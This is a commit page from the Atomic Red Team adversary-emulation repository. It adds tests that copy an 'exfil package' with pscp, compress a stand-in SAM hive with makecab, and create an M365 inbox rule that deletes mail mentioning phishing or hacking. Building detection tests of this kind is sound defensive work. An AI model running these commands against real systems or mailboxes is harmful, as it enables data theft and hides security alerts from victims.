security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Blueteam0ps 31072024 (#2902)

Browse Source 
* Update T1560.001.yaml

* Create T1564.008.yaml

* Update T1105.yaml

* Update T1560.001.yaml

Added back elevation_required: true to the previous test as it was mistakenly removed.

* Update T1105.yaml

Fixed up errors

* Update T1560.001.yaml

removed addition elevation_required option

* Update T1560.001.yaml

Fixed the issues based on the feedback
This commit is contained in:
BlueTeamOps
2024-09-25 07:42:55 +10:00
committed by GitHub
parent 2944337ec5
commit 2e9bea8316
3 changed files with 136 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1105/T1105.yaml
+56
View File
@@ -920,3 +920,59 @@ atomic_tests:
cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
name: powershell
elevation_required: true
- name: Remote File Copy using PSCP
auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
description: |
Copy a staged file using PSCP.exe to a public target location.
supported_platforms:
- windows
input_arguments:
pscp_url:
description: pscp.exe download path
type: string
default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
pscp_binary:
description: PSCP binary location
type: string
default: 'PathToAtomicsFolder\..\ExternalPayloads\pscp.exe'
scp_user:
description: Username of the SCP user
type: string
default: 'atomic'
scp_password:
description: Password for the SCP User
type: string
default: 'atomic'
scp_port:
description: port for the remote server
type: string
default: '22'
exfil_package:
description: path to exfil package
type: path
default: 'C:\Temp\T1105_scp.zip'
target_location:
description: Remote location where the data will be copied to.
type: string
default: 127.0.0.1
target_filename:
description: Filename on the destination.
type: string
default: T1105_scp.zip
dependency_executor_name: powershell
dependencies:
- description: |
pscp.exe must be available on the system.
prereq_command: |
if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
executor:
command: |
fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
cleanup_command: |
del /f /q #{exfil_package}
name: command_prompt
elevation_required: false
atomics/T1560.001/T1560.001.yaml
+30 -2
View File
@@ -383,5 +383,33 @@ atomic_tests:
rm c:\temp\loghost.txt
name: powershell
elevation_required: true
- name: Compress a File for Exfiltration using Makecab
auto_generated_guid: 2a7bc405-9555-4f49-ace2-b2ae2941d629
description: |
An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
[reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
supported_platforms:
- windows
input_arguments:
input_file:
description: Path to source file for compression
type: path
default: 'C:\Temp\sam.hiv'
output_file:
description: Path of the CAB file
type: path
default: 'C:\Temp\art.zip'
dependencies:
- description: |
A sample file for compression must be located at specified location (#{input_file})
prereq_command: |
if not exist "#{input_file}" (exit /b 1)
get_prereq_command: |
fsutil file createnew c:\Temp\sam.hiv 10485760
executor:
name: command_prompt
elevation_required: false
command: |
makecab.exe #{input_file} #{output_file}
cleanup_command: |
del #{output_file}
atomics/T1564.008/T1564.008.yaml
+50
View File
@@ -0,0 +1,50 @@
attack_technique: T1564.008
display_name: 'Hide Artifacts: Email Hiding Rules'
atomic_tests:
- name: New-Inbox Rule to Hide E-mail in M365
auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
description: |
This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
supported_platforms:
- azure-ad
input_arguments:
auth_username:
description: M365 Username
type: string
default: john@contoso.com
auth_password:
description: M365 Password
type: string
default: p4sswd
mail_rulename:
description: Name of the inbox rule.
type: string
default: default
target_mailbox:
description: Mailbox you are creating the rule in
type: string
default: jane@contoso.com
dependency_executor_name: powershell
dependencies:
- description: |
ExchangeOnlineManagement module must be installed.
prereq_command: |
try {if (Get-InstalledModule -Name ExchangeOnlineManagement -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
get_prereq_command: |
Install-Module -Name ExchangeOnlineManagement -Force
executor:
command: |
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
cleanup_command: |
Import-Module ExchangeOnlineManagement
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-ExchangeOnline -Credential $credential
Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
name: powershell
elevation_required: false